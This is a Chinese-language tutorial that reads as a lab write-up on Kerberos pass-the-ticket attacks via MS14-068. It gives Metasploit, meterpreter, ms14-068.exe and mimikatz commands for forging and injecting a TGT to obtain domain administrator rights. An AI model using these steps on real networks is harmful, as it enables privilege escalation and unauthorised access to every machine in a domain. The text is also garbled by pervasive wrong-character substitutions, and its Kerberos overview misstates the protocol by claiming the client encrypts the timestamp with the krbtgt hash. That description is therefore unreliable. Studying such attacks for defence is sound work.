域滲透之票據傳遞攻擊（pass the ticket，ptt）

票據傳遞攻擊（PtT）是一種使用Kerberos票據代替明文密碼或NTLM哈希的方法。PtT最多見的用途多是使用黃金票據和白銀票據，經過PtT訪問主機至關簡單。

1.ptt攻擊的部分

就不是簡單的NTLM認證了，它是利用Kerberos協議進行攻擊的

以前介紹了Kerberos協議具體工做方法：Kerberos認證方式，在域中，簡要介紹一下：

• 客戶機將明文密碼進行NTLM哈希,而後和時間戳一塊兒加密(使用krbtgt密碼hash做爲密鑰)，發送給kdc（域控），kdc對用戶進行檢測，成功以後建立TGT(Ticket-Granting Ticket)
• 將TGT進行加密簽名返回給客戶機器，只有域用戶krbtgt才能讀取kerberos中TGT數據
• 而後客戶機將TGT發送給域控制器KDC請求TGS（票證受權服務）票證，而且對TGT進行檢測
• 檢測成功以後，將目標服務帳戶的NTLM以及TGT進行加密，將加密後的結果返回給客戶機。

1.1 ms14-068

MS14-068是密鑰分發中心（KDC）服務中的Windows漏洞。它容許通過身份驗證的用戶在其Kerberos票證（TGT）中插入任意PAC（表示全部用戶權限的結構）。該漏洞位於kdcsvc.dll域控制器的密鑰分發中心(KDC)中。用戶能夠經過呈現具備改變的PAC的Kerberos TGT來得到票證.

在msf裏也集成了ms14-068的利用操做

要想使用咱們首先得：

1.域用戶sid和域控主機名，

 

2.目標域名稱

3.當前域用戶帳戶和密碼

 

 

而後再msf下

msf > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum

注意：這裏的rhost設置成你想要假冒的域的主機名，通常是域控主機名

而後找到生成的文件，TGT憑單（具備特權PAC信息）已保存在中

這種格式很是有用，由於能夠經過Mimikatz在Windows客戶端上或在linux客戶端上使用MIT kerberos導入

同時，可使用mimikatz轉換格式（任何mimikatz安裝均可以完成工做，而無需成爲域計算機或相似的東西）：

注意：mimikatz不支持注入xp以及如下系統

在kail系統下尚未默認安裝kerberos的認證功能因此咱們首先要安裝一個kerberos客戶端：

apt-get install krb5-user

而後在目標靶機上傳mimikatz和生成的bin文件，將咱們生成的bin文件轉換爲.kirbi文件，而後再在經過kiwi meterpreter擴展名加載。首先須要在域計算機上進行會話，而後使用kiwi擴展名導入TGT票證：

上傳mimikatz：

上傳bin文件：

 

mimikatz：

 

ok，導出的文件0-00000000-zhu1@krbtgt-XIAN.COM.kirbi如今能夠用於kiwi meterpreter擴展名加載。首先須要在域計算機上進行會話，而後使用kiwi擴展名導入TGT票證：

返回到meterpreter，注意這裏必需要有管理員權限才行。

meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

運行load kiwi

 

將生成的kirbi下載回來到本地/tmp/文件夾內：（由於我kali上的kerberos安裝有問題...）

download c:/wmpub/0-00000000-zhu1@krbtgt-XIAN.COM.kirbi /tmp/

 

最後注入票據：

 

最後一步老是失敗，多是msf上mimikatz對windows2003的支持問題，下次在win7上試一下。

 

1.2 使用ms14-068.exe

除了使用msf配合mimikatz，還可使用ms14-068.exe，全程在目標機上完成注入

1.2.1 使用whoami/user獲得域用戶的sid

1.2.2 執行payload生成TGT票據

    使用工具：ms14-068

    使用方法：

ms14-068.exe -u 域成員名@域名 -s 域成員sid -d 域控制器地址 -p 域成員密碼

        運行：

MS14-068.exe -u xian.com -s S-1-5-21-3472572548-430068626-1276128607-1106 -d 192.168.5.2 -p xxx

若是操做正確，且域機器是能夠和域控制器互通則會建立.ccache文件

當前目錄下生成僞造的票據文件：

1.2.3 票據注入

     使用mimikatz將票據注入到當前內存中，僞造憑證，若是成功則擁有域管理權限，可任意訪問域中全部機器

        mimikatz # kerberos::purge //清空當前機器中全部憑證，若是有域成員憑證會影響憑證僞造 
        mimikatz # kerberos::list //查看當前機器憑證 
        mimikatz # kerberos::ptc 票據文件 //將票據注入到內存中

 

 

顯示錯誤

通過上面實驗，和網上資料，域成員主機若是爲windows xp或windows server 2003，是沒法正常僞造票據的